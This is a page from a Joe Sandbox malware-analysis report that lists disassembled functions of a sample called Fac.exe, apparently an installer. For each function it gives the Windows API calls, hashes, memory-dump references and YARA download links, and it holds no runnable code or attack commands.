Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
Instruction ID: 90999bc76b255a60827136b2fd47affe8781ac3d45706895e3c6f95813f0c94e
Opcode Fuzzy Hash: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
Instruction Fuzzy Hash: 21913F71D04229CBDB28CF98C8547ADBBB1FF44305F14816ED456BB291C378AA86DF45

Function 00406CDA Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
Instruction ID: 7ab5a6fdb7118453f5bc4abdeeb58a7f0a93ca16cb9ae78d5f3cb9c6a39904d0
Opcode Fuzzy Hash: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
Instruction Fuzzy Hash: 8E814471E04229DBDF24CFA8C8447ADBBB1FF44301F24816AD456BB291C778AA86DF15

Function 004067DF Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
Instruction ID: 21cf7db9f51931c48f99e7e9547f5b24ff728e46d141457ef608e09f17fb8729
Opcode Fuzzy Hash: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
Instruction Fuzzy Hash: 4C815571D04229DBDB24CFA9D8447ADBBB0FB44301F2081AEE456BB281C7786A86DF55

Function 00406C2D Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
Instruction ID: dacb8e277fcbb3a33cac5efaa2c5173e23fd2fcd6bf81bdfe6f06a7534410a90
Opcode Fuzzy Hash: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
Instruction Fuzzy Hash: 6C714371E04229CBDF24CF98C8447ADBBB1FF44305F14806AD446BB281C738AA86DF04

Function 00406D4B Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
Instruction ID: 610106becc8cf73b6091924598cab7a4a25495cbbf2bb893dbe28c15679d0a85
Opcode Fuzzy Hash: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
Instruction Fuzzy Hash: 5C714271E04229CBDB28CF98C844BADBBB1FF44301F14816AD456BB291C738A986DF45

Function 00406C97 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
Instruction ID: 65b73de0ce6de3c7b1653dbcc26eb67f08ce95b734c4b9eb4028e98c7b5a0113
Opcode Fuzzy Hash: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
Instruction Fuzzy Hash: 0B714371E04229DBEF28CF98C8447ADBBB1FF44305F11806AD456BB291C738AA96DF45

Function 00402032 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D

Part of subcall function 004052EC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
Part of subcall function 004052EC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
Part of subcall function 004052EC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll), ref: 00405359
Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 625e2d01befe0dc7e528f44c483af3649fcdedc5513fd11a3b5737dd6ac49bd6
Instruction ID: 97d29300f9396016dda5dc64ca85157dedbc1c92ed1374a350dd7f5d7f4d946c
Opcode Fuzzy Hash: 625e2d01befe0dc7e528f44c483af3649fcdedc5513fd11a3b5737dd6ac49bd6
Instruction Fuzzy Hash: BE21AF31D00205AACF20AFA5CE4899E7A70AF04358F60413BF511B11E0DBB98981DA6E

Function 00401B77 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 00401BE7
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9

Strings

Call, xrefs: 00401B9E, 00401BA4, 00401BBE

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: Global$AllocFree
String ID: Call
API String ID: 3394109436-1824292864
Opcode ID: 992e8886db538b2378eb457e452863b67dea7c9f650ce1ee9c103e8892db631b
Instruction ID: c71429250c0cafa7b5cd6a02bb6544c1a7146a0c31e36a2bf00ca42990a6d084
Opcode Fuzzy Hash: 992e8886db538b2378eb457e452863b67dea7c9f650ce1ee9c103e8892db631b
Instruction Fuzzy Hash: 6E215472600141EBDB20FB94CE8595A73A4AB44318729057FF502B32D1DBB8A8919BAD

Function 70172A74 Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000), ref: 70172B33
GetLastError.KERNEL32 ref: 70172C3A

Memory Dump Source

Source File: 00000000.00000002.42445740510.0000000070171000.00000020.00000001.01000000.00000004.sdmp, Offset: 70170000, based on PE: true

Associated: 00000000.00000002.42445700312.0000000070170000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.42445795216.0000000070173000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.42445848499.0000000070175000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70170000_Fac.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: e5fc202c33b86fa9cd4fcf79a6fe26a57a1eb158e2f50b8faa4584338c910915
Instruction ID: 2047a0e68c8bee90b9fdd3725405b07af2f0c5266cff39a51592168b3b4862d5
Opcode Fuzzy Hash: e5fc202c33b86fa9cd4fcf79a6fe26a57a1eb158e2f50b8faa4584338c910915
Instruction Fuzzy Hash: D5517A729042049FDB21DFA5DC82B9D7BB5EB54314F30A4A9FA05C7A60D778A8C2CB91

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
Instruction ID: 643084589b99c3aa520b22feaac895240b719bdb66a029b0c5212504e21fbf59
Opcode Fuzzy Hash: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
Instruction Fuzzy Hash: 7A01F4317242119BEB195B799D09B3A3798E710314F14463FF855F62F1DA78CC529B4C

Function 00401E49 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401E67
EnableWindow.USER32(00000000,00000000), ref: 00401E72

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 0ff4c43ca7c5305b810fc1be34eeb667a1865b3eede0763af0d3e02c0eb9f5d7
Instruction ID: 63871ab535fe988d3adb25008cf832d4d85dc6cfcdc2aab035335d2457ba8122
Opcode Fuzzy Hash: 0ff4c43ca7c5305b810fc1be34eeb667a1865b3eede0763af0d3e02c0eb9f5d7
Instruction Fuzzy Hash: 2BE0D832E08200CFE724DFA5AA4946D77B4EB80314720447FF201F11D1CE7848418F6D

Function 0040665E Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
GetProcAddress.KERNEL32(00000000,?), ref: 0040668B

Part of subcall function 004065EE: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
Part of subcall function 004065EE: wsprintfW.USER32 ref: 00406640
Part of subcall function 004065EE: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
Instruction ID: b981dfd93ec331c3b9a34c40441268954a5fd10c61cb517d904db4ec9094c3f9
Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
Instruction Fuzzy Hash: DFE08C326042116BD7159B70AE4487B63AC9A89650307883EFD4AF2181EB39EC31A66D

Function 00405D7A Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Fac.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15

Function 00405D55 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,0040595A,?,?,00000000,00405B30,?,?,?,?), ref: 00405D5A
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D6E

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction ID: a3d3d340e07fbe3a7a5d47ed685d46f7c513eabc37ca73d627b83f1c605c53fe
Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction Fuzzy Hash: DFD0C972504820ABC6512728EF0C89BBB95DB542717028B35FAA9A22B0DB304C568A98

Function 00405838 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,0040334C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77293420,004035A3,?,00000006,00000008,0000000A), ref: 0040583E
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040584C

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
